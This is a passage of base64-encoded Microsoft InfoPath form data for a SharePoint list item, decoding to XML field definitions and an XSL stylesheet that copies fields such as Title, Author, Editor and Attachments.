yZWF0ZWQgeHNpOm5pbD0idHJ1ZSI+PC9xOkNyZWF0ZWQ+DQoJCTwvcTpTaGFyZVBvaW50TGlzdEl0ZW1fUlc+DQoJPC9kZnM6cXVlcnlGaWVsZHM+DQoJPGRmczpkYXRhRmllbGRzPg0KCQk8bXk6U2hhcmVQb2ludExpc3RJdGVtX1JXPg0KCQkJPG15OklEIHhzaTpuaWw9InRydWUiPjwvbXk6SUQ+DQoJCQk8bXk6VGl0bGU+PC9teTpUaXRsZT4NCgkJCTxteTpBdXRob3I+DQoJCQkJPHBjOlBlcnNvbj4NCgkJCQkJPHBjOkRpc3BsYXlOYW1lPjwvcGM6RGlzcGxheU5hbWU+DQoJCQkJCTxwYzpBY2NvdW50SWQ+PC9wYzpBY2NvdW50SWQ+DQoJCQkJCTxwYzpBY2NvdW50VHlwZT48L3BjOkFjY291bnRUeXBlPg0KCQkJCTwvcGM6UGVyc29uPg0KCQkJPC9teTpBdXRob3I+DQoJCQk8bXk6RWRpdG9yPg0KCQkJCTxwYzpQZXJzb24+DQoJCQkJCTxwYzpEaXNwbGF5TmFtZT48L3BjOkRpc3BsYXlOYW1lPg0KCQkJCQk8cGM6QWNjb3VudElkPjwvcGM6QWNjb3VudElkPg0KCQkJCQk8cGM6QWNjb3VudFR5cGU+PC9wYzpBY2NvdW50VHlwZT4NCgkJCQk8L3BjOlBlcnNvbj4NCgkJCTwvbXk6RWRpdG9yPg0KCQkJPG15Ok1vZGlmaWVkIHhzaTpuaWw9InRydWUiPjwvbXk6TW9kaWZpZWQ+DQoJCQk8bXk6Q3JlYXRlZCB4c2k6bmlsPSJ0cnVlIj48L215OkNyZWF0ZWQ+DQoJCQk8bXk6QXR0YWNobWVudHM+PC9teTpBdHRhY2htZW50cz4NCgkJPC9teTpTaGFyZVBvaW50TGlzdEl0ZW1fUlc+DQoJPC9kZnM6ZGF0YUZpZWxkcz4NCjwvZGZzOm15RmllbGRzPg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+DQo8eHNsOnN0eWxlc2hlZXQgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOm1zeHNsPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhzbHQiIHhtbG5zOnhzaT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hlbWEtaW5zdGFuY2UiIHhtbG5zOmRmcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9kYXRhRm9ybVNvbHV0aW9uIiB4bWxuczpkPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvZGF0YUZpZWxkcyIgeG1sbnM6cGM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDcvUGFydG5lckNvbnRyb2xzIiB4bWxuczpteT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9XU1NMaXN0L2NtZURhdGFGaWVsZHMiIHhtbG5zOm1hPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L21ldGFkYXRhL3Byb3BlcnRpZXMvbWV0YUF0dHJpYnV0ZXMiIHhtbG5zOnE9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9xdWVyeUZpZWxkcyIgeG1sbnM6ZG1zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS8yMDA5L2RvY3VtZW50TWFuYWdlbWVudC90eXBlcyIgeG1sbnM6eGQ9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMiIHZlcnNpb249IjEuMCI+DQoJPHhzbDpvdXRwdXQgZW5jb2Rpbmc9IlVURi04IiBtZXRob2Q9InhtbCIvPg0KCTx4c2w6dGVtcGxhdGUgbWF0Y2g9Ii8iPg0KCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSJwcm9jZXNzaW5nLWluc3RydWN0aW9uKCkgfCBjb21tZW50KCkiLz4NCgkJPHhzbDpjaG9vc2U+DQoJCQk8eHNsOndoZW4gdGVzdD0iZGZzOm15RmllbGRzIj4NCgkJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9ImRmczpteUZpZWxkcyIgbW9kZT0iXzAiLz4NCgkJCTwveHNsOndoZW4+DQoJCQk8eHNsOm90aGVyd2lzZT4NCgkJCQk8eHNsOnZhcmlhYmxlIG5hbWU9InZhciI+DQoJCQkJCTx4c2w6ZWxlbWVudCBuYW1lPSJkZnM6bXlGaWVsZHMiLz4NCgkJCQk8L3hzbDp2YXJpYWJsZT4NCgkJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9Im1zeHNsOm5vZGUtc2V0KCR2YXIpLyoiIG1vZGU9Il8wIi8+DQoJCQk8L3hzbDpvdGhlcndpc2U+DQoJCTwveHNsOmNob29zZT4NCgk8L3hzbDp0ZW1wbGF0ZT4NCgk8eHNsOnRlbXBsYXRlIG1hdGNoPSJxOlNoYXJlUG9pbnRMaXN0SXRlbV9SVyIgbW9kZT0iXzIiPg0KCQk8eHNsOmNvcHk+DQoJCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSJAKltuYW1lc3BhY2UtdXJpKCkgPSAnaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9hZG9tYXBwaW5nJyBvciBuYW1lc3BhY2UtdXJpKCkgPSAndXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhJyBvciBuYW1lc3BhY2UtdXJpKCkgPSAndXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtZGlmZmdyYW0tdjEnXSIvPg0KCQkJPHhzbDplbGVtZW50IG5hbWU9InE6SUQiPg0KCQkJCTx4c2w6Y2hvb3NlPg0KCQkJCQk8eHNsOndoZW4gdGVzdD0icTpJRC90ZXh0KClbMV0iPg0KCQkJCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0icTpJRC90ZXh0KClbMV0iLz4NCgkJCQkJPC94c2w6d2hlbj4NCgkJCQkJPHhzbDpvdGhlcndpc2U+DQoJCQkJCQk8eHNsOmF0dHJpYnV0ZSBuYW1lPSJ4c2k6bmlsIj50cnVlPC94c2w6YXR0cmlidXRlPg0KCQkJCQk8L3hzbDpvdGhlcndpc2U+DQoJCQkJPC94c2w6Y2hvb3NlPg0KCQkJPC94c2w6ZWxlbWVudD4NCgkJCTx4c2w6ZWxlbWVudCBuYW1lPSJxOlRpdGxlIj4NCgkJCQk8eHNsOmNob29zZT4NCgkJCQkJPHhzbDp3aGVuIHRlc3Q9InE6VGl0bGUvdGV4dCgpWzFdIj4NCgkJCQkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9InE6VGl0bGUvdGV4dCgpWzFdIi8+DQoJCQkJCTwveHNsOndoZW4+DQoJCQkJCTx4c2w6b3RoZXJ3aXNlPg0KCQkJCQkJPHhzbDphdHRyaWJ1dGUgbmFtZT0ieHNpkrGH/1xxXHE6bmlsIj50cnVlPC94c2w6YXR0cmlidXRlPg0KCQkJCQk8L3hzbDpvdGhlcndpc2U+DQoJCQkJPC94c2w6Y2hvb3NlPg0KCQkJPC94c2w6ZWxlbWVudD4NCgkJCTx4c2w6ZWxlbWVudCBuYW1lPSJxOkF1dGhvciI+DQoJCQkJPHhzbDpjaG9vc2U+DQoJCQkJCTx4c2w6d2hlbiB0ZXN0PSJxOkF1dGhvci90ZXh0KClbMV0iPg0KCQkJCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0icTpBdXRob3IvdGV4dCgpWzFdIi8+DQoJCQkJCTwveHNsOndoZW4+DQoJCQkJCTx4c2w6b3RoZXJ3aXNlPg0KCQkJCQkJPHhzbDphdHRyaWJ1dGUgbmFtZT0ieHNpOm5pbCI+dHJ1ZTwveHNsOmF0dHJpYnV0ZT4NCgkJCQkJPC94c2w6b3RoZXJ3aXNlPg0KCQkJCTwveHNsOmNob29zZT4NCgkJCTwveHNsOmVsZW1lbnQ+DQoJCQk8eHNsOmVsZW1lbnQgbmFtZT0icTpFZGl0b3IiPg0KCQkJCTx4c2w6Y2hvb3NlPg0KCQkJCQk8eHNsOndoZW4gdGVzdD0icTpFZGl0b3IvdGV4dCgpWzFdIj4NCgkJCQkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9InE6RWRpdG9yL3RleHQoKVsxXSIvPg0KCQkJCQk8L3hzbDp3aGVuPg0KCQkJCQk8eHNsOm90aGVyd2lzZT4NCgkJCQkJCTx4c2w6YXR0cmlidXRlIG5hbWU9InhzaTpuaWwiPnRydWU8L3hzbDphdHRyaWJ1dGU+DQoJCQkJCTwveHNsOm90aGVyd2lzZT4NCgkJCQk8L3hzbDpjaG9vc2U+DQoJCQk8L3hzbDplbGVtZW50Pg0KCQkJPHhzbDplbGVtZW50IG5hbWU9InE6TW9kaWZpZWQiPg0KCQkJCTx4c2w6Y2hvb3NlPg0KCQkJCQk8eHNsOndoZW4gdGVzdD0icTpNb2RpZmllZC90ZXh0KClbMV0iPg0KCQkJCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0icTpNb2RpZmllZC90ZXh0KClbMV0iLz4NCgkJCQkJPC94c2w6d2hlbj4NCgkJCQkJPHhzbDpvdGhlcndpc2U+DQoJCQkJCQk8eHNsOmF0dHJpYnV0ZSBuYW1lPSJ4c2k6bmlsIj50cnVlPC94c2w6YXR0cmlidXRlPg0KCQkJCQk8L3hzbDpvdGhlcndpc2U+DQoJCQkJPC94c2w6Y2hvb3NlPg0KCQkJPC94c2w6ZWxlbWVudD4NCgkJCTx4c2w6ZWxlbWVudCBuYW1lPSJxOkNyZWF0ZWQiPg0KCQkJCTx4c2w6Y2hvb3NlPg0KCQkJCQk8eHNsOndoZW4gdGVzdD0icTpDcmVhdGVkL3RleHQoKVsxXSI+DQoJCQkJCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSJxOkNyZWF0ZWQvdGV4dCgpWzFdIi8+DQoJCQkJCTwveHNsOndoZW4+DQoJCQkJCTx4c2w6b3RoZXJ3aXNlPg0KCQkJCQkJPHhzbDphdHRyaWJ1dGUgbmFtZT0ieHNpOm5pbCI+dHJ1ZTwveHNsOmF0dHJpYnV0ZT4NCgkJCQkJPC94c2w6b3RoZXJ3aXNlPg0KCQkJCTwveHNsOmNob29zZT4NCgkJCTwveHNsOmVsZW1lbnQ+DQoJCTwveHNsOmNvcHk+DQoJPC94c2w6dGVtcGxhdGU+DQoJPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iZGZzOnF1ZXJ5RmllbGRzIiBtb2RlPSJfMSI+DQoJCTx4c2w6Y29weT4NCgkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9IkAqW25hbWVzcGFjZS11cmkoKSA9ICdodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2Fkb21hcHBpbmcnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSddIi8+DQoJCQk8eHNsOmNob29zZT4NCgkJCQk8eHNsOndoZW4gdGVzdD0icTpTaGFyZVBvaW50TGlzdEl0ZW1fUlciPg0KCQkJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9InE6U2hhcmVQb2ludExpc3RJdGVtX1JXWzFdIiBtb2RlPSJfMiIvPg0KCQkJCTwveHNsOndoZW4+DQoJCQkJPHhzbDpvdGhlcndpc2U+DQoJCQkJCTx4c2w6dmFyaWFibGUgbmFtZT0idmFyIj4NCgkJCQkJCTx4c2w6ZWxlbWVudCBuYW1lPSJxOlNoYXJlUG9pbnRMaXN0SXRlbV9SVyIvPg0KCQkJCQk8L3hzbDp2YXJpYWJsZT4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJtc3hzbDpub2RlLXNldCgkdmFyKS8qIiBtb2RlPSJfMiIvPg0KCQkJCTwveHNsOm90aGVyd2lzZT4NCgkJCTwveHNsOmNob29zZT4NCgkJPC94c2w6Y29weT4NCgk8L3hzbDp0ZW1wbGF0ZT4NCgk8eHNsOnRlbXBsYXRlIG1hdGNoPSJwYzpQZXJzb24iIG1vZGU9Il82Ij4NCgkJPHhzbDpjb3B5Pg0KCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0iQCpbbmFtZXNwYWNlLXVyaSgpID0gJ2h0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMvYWRvbWFwcGluZycgb3IgbmFtZXNwYWNlLXVyaSgpID0gJ3VybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLW1zZGF0YScgb3IgbmFtZXNwYWNlLXVyaSgpID0gJ3VybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eG1sLWRpZmZncmFtLXYxJ10iLz4NCgkJCTx4c2w6ZWxlbWVudCBuYW1lPSJwYzpEaXNwbGF5TmFtZSI+DQoJCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0icGM6RGlzcGxheU5hbWUvdGV4dCgpWzFdIi8+DQoJCQk8L3hzbDplbGVtZW50Pg0KCQkJPHhzbDplbGVtZW50IG5hbWU9InBjOkFjY291bnRJZCI+DQoJCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0icGM6QWNjb3VudElkL3RleHQoKVsxXSIvPg0KCQkJPC94c2w6ZWxlbWVudD4NCgkJCTx4c2w6ZWxlbWVudCBuYW1lPSJwYzpBY2NvdW50VHlwZSI+DQoJCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0icGM6QWNjb3VudFR5cGUvdGV4dCgpWzFdIi8+DQoJCQk8L3hzbDplbGVtZW50Pg0KCQk8L3hzbDpjb3B5Pg0KCTwveHNsOnRlbXBsYXRlPg0KCTx4c2w6dGVtcGxhdGUgbWF0Y2g9Im15OkF1dGhvciIgbW9kZT0iXzUiPg0KCQk8eHNsOmNvcHk+DQoJCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSJAKltuYW1lc3BhY2UtdXJpKCkgPSAnaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9hZG9tYXBwaW5nJyBvciBuYW1lc3BhY2UtdXJpKCkgPSAndXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhJyBvciBuYW1lc3BhY2UtdXJpKCkgPSAndXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtZGlmZmdyYW0tdjEnXSIvPg0KCQkJPHhzbDpjaG9vc2U+DQoJCQkJPHhzbDp3aGVuIHRlc3Q9InBjOlBlcnNvbiI+DQoJCQkJCTx4c2w6YXBwbHktdGVtcGxhdGVzIHNlbGVjdD0icGM6UGVyc29uIiBtb2RlPSJfNiIvPg0KCQkJCTwveHNsOndoZW4+DQoJCQkJPHhzbDpvdGhlcndpc2U+DQoJCQkJCTx4c2w6dmFyaWFibGUgbmFtZT0idmFyIj4NCgkJCQkJCTx4c2w6ZWxlbWVudCBuYW1lPSJwYzpQZXJzb24iLz4NCgkJCQkJPC94c2w6dmFyaWFibGU+DQoJCQkJCTx4c2w6YXBwbHktdGVtcGxhdGVzIHNlbGVjdD0ibXN4c2w6bm9kZS1zZXQoJHZhcikvKiIgbW9kZT0iXzYiLz4NCgkJCQk8L3hzbDpvdGhlcndpc2U+DQoJCQk8L3hzbDpjaG9vc2U+DQoJCTwveHNsOmNvcHk+DQoJPC94c2w6dGVtcGxhdGU+DQoJPHhzbDp0ZW1wbGF0ZSBtYXRjaD0ibXk6RWRpdG9yIiBtb2RlPSJfNyI+DQoJCTx4c2w6Y29weT4NCgkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9IkAqW25hbWVzcGFjZS11cmkoKSA9ICdodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2Fkb21hcHBpbmcnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSddIi8+DQoJCQk8eHNsOmNob29zZT4NCgkJCQk8eHNsOndoZW4gdGVzdD0icGM6UGVyc29uIj4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJwYzpQZXJzb24iIG1vZGU9Il82Ii8+DQoJCQkJPC94c2w6d2hlbj4NCgkJCQk8eHNsOm90aGVyd2lzZT4NCgkJCQkJPHhzbDp2YXJpYWJsZSBuYW1lPSJ2YXIiPg0KCQkJCQkJPHhzbDplbGVtZW50IG5hbWU9InBjOlBlcnNvbiIvPg0KCQkJCQk8L3hzbDp2YXJpYWJsZT4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJtc3hzbDpub2RlLXNldCgkdmFyKS8qIiBtb2RlPSJfNiIvPg0KCQkJCTwveHNsOm90aGVyd2lzZT4NCgkJCTwveHNsOmNob29zZT4NCgkJPC94c2w6Y29weT4NCgk8L3hzbDp0ZW1wbGF0ZT4NCgk8eHNsOnRlbXBsYXRlIG1hdGNoPSJhdHRhY2htZW50VVJMIiBtb2RlPSJfOSI+DQoJCTx4c2w6Y29weT4NCgkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9IkAqW25hbWVzcGFjZS11cmkoKSA9ICdodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2Fkb21hcHBpbmcnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSddIi8+DQoJCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSIuL3RleHQoKVsxXSIvPg0KCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0iLi9AeHNpOm5pbCIvPg0KCQk8L3hzbDpjb3B5Pg0KCTwveHNsOnRlbXBsYXRlPg0KCTx4c2w6dGVtcGxhdGUgbWF0Y2g9Im15OkF0dGFjaG1lbnRzIiBtb2RlPSJfOCI+DQoJCTx4c2w6Y29weT4NCgkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9IkAqW25hbWVzcGFjZS11cmkoKSA9ICdodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2Fkb21hcHBpbmcnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSddIi8+DQoJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9ImF0dGFjaG1lbnRVUkwiIG1vZGU9Il85Ii8+DQoJCTwveHNsOmNvcHk+DQoJPC94c2w6dGVtcGxhdGU+DQoJPHhzbDp0ZW1wbGF0ZSBtYXRjaD0ibXk6U2hhcmVQb2ludExpc3RJdGVtX1JXIiBtb2RlPSJfNCI+DQoJCTx4c2w6Y29weT4NCgkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9IkAqW25hbWVzcGFjZS11cmkoKSA9ICdodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2Fkb21hcHBpbmcnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSddIi8+DQoJCQk8eHNsOmVsZW1lbnQgbmFtZT0ibXk6SUQiPg0KCQkJCTx4c2w6Y2hvb3NlPg0KCQkJCQk8eHNsOndoZW4gdGVzdD0ibXk6SUQvdGV4dCgpWzFdIj4NCgkJCQkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9Im15OklEL3RleHQoKVsxXSIvPg0KCQkJCQk8L3hzbDp3aGVuPg0KCQkJCQk8eHNsOm90aGVyd2lzZT4NCgkJCQkJCTx4c2w6YXR0cmlidXRlIG5hbWU9InhzaTpuaWwiPnRydWU8L3hzbDphdHRyaWJ1dGU+DQoJCQkJCTwveHNsOm90aGVyd2lzZT4NCgkJCQk8L3hzbDpjaG9vc2U+DQoJCQk8L3hzbDplbGVtZW50Pg0KCQkJPHhzbDplbGVtZW50IG5hbWU9Im15OlRpdGxlIj4NCgkJCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSJteTpUaXRsZS90ZXh0KClbMV0iLz4NCgkJCTwveHNsOmVsZW1lbnQ+DQoJCQk8eHNsOmNob29zZT4NCgkJCQk8eHNsOndoZW4gdGVzdD0ibXk6QXV0aG9yIj4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJteTpBdXRob3JbMV0iIG1vZGU9Il81Ii8+DQoJCQkJPC94c2w6d2hlbj4NCgkJCQk8eHNsOm90aGVyd2lzZT4NCgkJCQkJPHhzbDp2YXJpYWJsZSBuYW1lPSJ2YXIiPg0KCQkJCQkJPHhzbDplbGVtZW50IG5hbWU9Im15OkF1dGhvciIvPg0KCQkJCQk8L3hzbDp2YXJpYWJsZT4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJtc3hzbDpub2RlLXNldCgkdmFyKS8qIiBtb2RlPSJfNSIvPg0KCQkJCTwveHNsOm90aGVyd2lzZT4NCgkJCTwveHNsOmNob29zZT4NCgkJCTx4c2w6Y2hvb3NlPg0KCQkJCTx4c2w6d2hlbiB0ZXN0PSJteTpFZGl0b3IiPg0KCQkJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9Im15OkVkaXRvclsxXSIgbW9kZT0iXzciLz4NCgkJCQk8L3hzbDp3aGVuPg0KCQkJCTx4c2w6b3RoZXJ3aXNlPg0KCQkJCQk8eHNsOnZhcmlhYmxlIG5hbWU9InZhciI+DQoJCQkJCQk8eHNsOmVsZW1lbnQgbmFtZT0ibXk6RWRpdG9yIi8+DQoJCQkJCTwveHNsOnZhcmlhYmxlPg0KCQkJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9Im1zeHNsOm5vZGUtc2V0KCR2YXIpLyoiIG1vZGU9Il83Ii8+DQoJCQkJPC94c2w6b3RoZXJ3aXNlPg0KCQkJPC94c2w6Y2hvb3NlPg0KCQkJPHhzbDplbGVtZW50IG5hbWU9Im15Ok1vZGlmaWVkIj4NCgkJCQk8eHNsOmNob29zZT4NCgkJCQkJPHhzbDp3aGVuIHRlc3Q9Im15Ok1vZGlmaWVkL3RleHQoKVsxXSI+DQoJCQkJCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSJteTpNb2RpZmllZC90ZXh0KClbMV0iLz4NCgkJCQkJPC94c2w6d2hlbj4NCgkJCQkJPHhzbDpvdGhlcndpc2U+DQoJCQkJCQk8eHNsOmF0dHJpYnV0ZSBuYW1lPSJ4c2k6bmlsIj50cnVlPC94c2w6YXR0cmlidXRlPg0KCQkJCQk8L3hzbDpvdGhlcndpc2U+DQoJCQkJPC94c2w6Y2hvb3NlPg0KCQkJPC94c2w6ZWxlbWVudD4NCgkJCTx4c2w6ZWxlbWVudCBuYW1lPSJteTpDcmVhdGVkIj4NCgkJCQk8eHNsOmNob29zZT4NCgkJCQkJPHhzbDp3aGVuIHRlc3Q9Im15OkNyZWF0ZWQvdGV4dCgpWzFdIj4NCgkJCQkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9Im15OkNyZWF0ZWQvdGV4dCgpWzFdIi8+DQoJCQkJCTwveHNsOndoZW4+DQoJCQkJCTx4c2w6b3RoZXJ3aXNlPg0KCQkJCQkJPHhzbDphdHRyaWJ1dGUgbmFtZT0ieHNpOm5pbCI+dHJ1ZTwveHNsOmF0dHJpYnV0ZT4NCgkJCQkJPC94c2w6b3RoZXJ3aXNlPg0KCQkJCTwveHNsOmNob29zZT4NCgkJCTwveHNsOmVsZW1lbnQ+DQoJCQk8eHNsOmNob29zZT4NCgkJCQk8eHNsOndoZW4gdGVzdD0ibXk6QXR0YWNobWVudHMiPg0KCQkJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9Im15OkF0dGFjaG1lbnRzWzFdIiBtb2RlPSJfOCIvPg0KCQkJCTwveHNsOndoZW4+DQoJCQkJPHhzbDpvdGhlcndpc2U+DQoJCQkJCTx4c2w6dmFyaWFibGUgbmFtZT0idmFyIj4NCgkJCQkJCTx4c2w6ZWxlbWVudCBuYW1lPSJteTpBdHRhY2htZW50cyIvPg0KCQkJCQk8L3hzbDp2YXJpYWJsZT4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJtc3hzbDpub2RlLXNldCgkdmFyKS8qIiBtb2RlPSJfOCIvPg0KCQkJCTwveHNsOm90aGVyd2lzZT4NCgkJCTwveHNsOmNob29zZT4NCgkJPC94c2w6Y29weT4NCgk8L3hzbDp0ZW1wbGF0ZT4NCgk8eHNsOnRlbXBsYXRlIG1hdGNoPSJkZnM6ZGF0YUZpZWxkcyIgbW9kZT0iXzMiPg0KCQk8eHNsOmNvcHk+DQoJCQk8eHNsOmNvcHktb2Ygc2VsZWN0PSJAKltuYW1lc3BhY2UtdXJpKCkgPSAnaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9hZG9tYXBwaW5nJyBvciBuYW1lc3BhY2UtdXJpKCkgPSAndXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtbXNkYXRhJyBvciBuYW1lc3BhY2UtdXJpKCkgPSAndXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4bWwtZGlmZmdyYW0tdjEnXSIvPg0KCQkJPHhzbDpjaG9vc2U+DQoJCQkJPHhzbDp3aGVuIHRlc3Q9Im15OlNoYXJlUG9pbnRMaXN0SXRlbV9SVyI+DQoJCQkJCTx4c2w6YXBwbHktdGVtcGxhdGVzIHNlbGVjdD0ibXk6U2hhcmVQb2ludExpc3RJdGVtX1JXWzFdIiBtb2RlPSJfNCIvPg0KCQkJCTwveHNsOndoZW4+DQoJCQkJPHhzbDpvdGhlcndpc2U+DQoJCQkJCTx4c2w6dmFyaWFibGUgbmFtZT0idmFyIj4NCgkJCQkJCTx4c2w6ZWxlbWVudCBuYW1lPSJteTpTaGFyZVBvaW50TGlzdEl0ZW1fUlciLz4NCgkJCQkJPC94c2w6dmFyaWFibGU+DQoJCQkJCTx4c2w6YXBwbHktdGVtcGxhdGVzIHNlbGVjdD0ibXN4c2w6bm9kZS1zZXQoJHZhcikvKiIgbW9kZT0iXzQiLz4NCgkJCQk8L3hzbDpvdGhlcndpc2U+DQoJCQk8L3hzbDpjaG9vc2U+DQoJCTwveHNsOmNvcHk+DQoJPC94c2w6dGVtcGxhdGU+DQoJPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iZGZzOm15RmllbGRzIiBtb2RlPSJfMCI+DQoJCTx4c2w6Y29weT4NCgkJCTx4c2w6Y29weS1vZiBzZWxlY3Q9IkAqW25hbWVzcGFjZS11cmkoKSA9ICdodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL2Fkb21hcHBpbmcnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1tc2RhdGEnIG9yIG5hbWVzcGFjZS11cmkoKSA9ICd1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOnhtbC1kaWZmZ3JhbS12MSddIi8+DQoJCQk8eHNsOmNob29zZT4NCgkJCQk8eHNsOndoZW4gdGVzdD0iZGZzOnF1ZXJ5RmllbGRzIj4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJkZnM6cXVlcnlGaWVsZHNbMV0iIG1vZGU9Il8xIi8+DQoJCQkJPC94c2w6d2hlbj4NCgkJCQk8eHNsOm90aGVyd2lzZT4NCgkJCQkJPHhzbDp2YXJpYWJsZSBuYW1lPSJ2YXIiPg0KCQkJCQkJPHhzbDplbGVtZW50IG5hbWU9ImRmczpxdWVyeUZpZWxkcyIvPg0KCQkJCQk8L3h